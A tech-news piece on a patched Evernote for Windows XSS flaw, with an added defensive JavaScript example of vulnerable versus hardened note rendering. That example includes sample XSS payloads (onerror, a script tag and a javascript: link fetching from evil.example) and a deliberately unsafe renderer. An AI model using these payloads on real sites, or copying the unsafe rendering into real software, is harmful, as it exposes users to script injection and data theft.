Evernote just patched a serious XSS flaw, make sure you’re updated

Jonny Caldwell

A major security flaw has just been patched in Evernote for Windows. The vulnerability allows hackers to run programs remotely by sharing a note that contains malicious code with a user.

To be a little more technical, the hack used two types of cross-site scripting (XSS) vulnerabilities. The first allows a hacker to alter seemingly legitimate links so that they download malicious executable code. The second links to another webpage containing embedded malicious code that was injected into user-supplied data, such as the fields of a contact form, and that executes as soon as the page loads.

A hacker can exploit either of these XSS vulnerabilities by sharing a note through any form of communication, such as email, to bait users into clicking and triggering the code. Sophos’s Naked Security blog goes into much more depth on exactly how this works and how it was discovered.
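As an added illustration (not Evernote’s code and not taken from the Sophos write-up), the snippet below contrasts rendering a shared note’s untrusted fields straight into HTML with escaping them and restricting link schemes, which is the defensive side of the two XSS types described above. The note contents and URLs are constructed samples.

```javascript
// Added example (not Evernote's code): rendering a shared note's untrusted
// fields the vulnerable way vs. the hardened way. Runs under Node, no DOM needed.

// Constructed sample note, shaped like a share an attacker might send.
const SHARED_NOTE = {
  title: 'Meeting notes <img src=x onerror="alert(1)">',
  body: 'Agenda: budget review <script>fetch("https://evil.example/x")</script>',
  links: [
    { text: 'Quarterly report', href: 'https://example.com/report.pdf' },
    { text: 'Open in app', href: 'javascript:void(fetch("https://evil.example/y"))' },
  ],
};

// Escape the five characters that can break out of HTML text or attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Allow only http(s) links; javascript:, data:, file: and unparsable values are dropped.
function safeHref(href) {
  try {
    const u = new URL(String(href));
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : null;
  } catch (e) {
    return null;
  }
}

// Vulnerable: note fields are concatenated directly into the markup.
function renderNoteUnsafe(note) {
  const links = note.links.map((l) => `<a href="${l.href}">${l.text}</a>`).join('');
  return `<h1>${note.title}</h1><p>${note.body}</p>${links}`;
}

// Hardened: every untrusted field is escaped and every link scheme is checked.
function renderNoteSafe(note) {
  const links = note.links.map((l) => {
    const href = safeHref(l.href);
    // A rejected link is shown as plain text: the user still sees it but cannot follow it.
    return href
      ? `<a href="${escapeHtml(href)}">${escapeHtml(l.text)}</a>`
      : `<span>${escapeHtml(l.text)}</span>`;
  }).join('');
  return `<h1>${escapeHtml(note.title)}</h1><p>${escapeHtml(note.body)}</p>${links}`;
}
```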

Luckily, anyone running Windows can update to the latest version by clicking our download link below and then clicking Update (or Install if the app isn’t already installed).

Evernote also gained a new templates feature last month, so perhaps the security flaw will be overlooked by consumers who already use the app as their primary place for jotting information down.

Do you use Evernote or do you find Microsoft’s OneNote a better alternative? Let us know in the comments below.

Evernote
Developer: Evernote
Price: Free+